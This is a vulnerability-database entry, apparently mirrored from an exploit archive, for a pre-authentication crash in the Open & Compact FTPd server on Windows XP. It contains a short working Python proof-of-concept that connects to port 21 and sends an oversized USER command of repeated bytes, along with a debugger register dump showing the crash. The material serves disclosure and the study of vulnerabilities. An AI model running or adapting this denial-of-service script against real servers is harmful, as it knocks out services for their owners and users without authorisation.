Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Open and Compact FTPd Pre-Authentication Crash (PoC)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 13 Views

Open & Compact FTPd Pre-Authentication Crash (PoC) vulnerability Python scrip

Code

                                                # Title: Open & Compact FTPd Pre-Authentication Crash (PoC)
# Found by: loneferret
# Hat's off to dookie2000ca
# Date Found: 07/02/2010
# Software link: https://sourceforge.net/projects/open-ftpd/
# Tested on: Windows XP SP2/SP3 Professional
# Nod to the Exploit-DB Team
#
# It's really just a DoS, but if someone can find more go ahead
#
#!/usr/bin/python

#Registers From Immunity 
#
#EAX FFFFFFFF
#ECX 00149A29
#EDX 7C90E4F4 ntdll.KiFastSystemCallRet
#EBX 00000000
#ESP 0012FA1C
#EBP 00000002
#ESI 0012FA5C
#EDI 0012FCB4
#EIP 004113A3
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 0  DS 0023 32bit 0(FFFFFFFF)
#S 1  FS 003B 32bit 7FFDF000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010286 (NO,NB,NE,A,S,PE,L,LE)
#ST0 empty %#.19L
#ST1 empty -??? FFFF 7C910208 7C90E900
#ST2 empty -UNORM DCD0 7C9101BB 7C91017B
#ST3 empty %#.19L
#ST4 empty +UNORM 00B2 00000000 00000000
#ST5 empty +UNORM 7D80 77F67D78 01C3DA90
#ST6 empty -UNORM DD24 00000000 00000409
#ST7 empty -UNORM E3F4 0014E3F4 0014E3F4
#               3 2 1 0      E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1


#
#Developper Informed on: 07/02/2010
#Developper Contacted second time on: 08/02/2010
#

import socket

buffer = ("\x41\x2C\x20") * 200

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.112',21))
s.recv(1024)
s.send('USER '+buffer+'\r\n')
s.recv(1024)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
ftp serverpre-authenticationdenial of servicepython scriptvulnerabilitywindows xpsourceforgeexploit-db team
13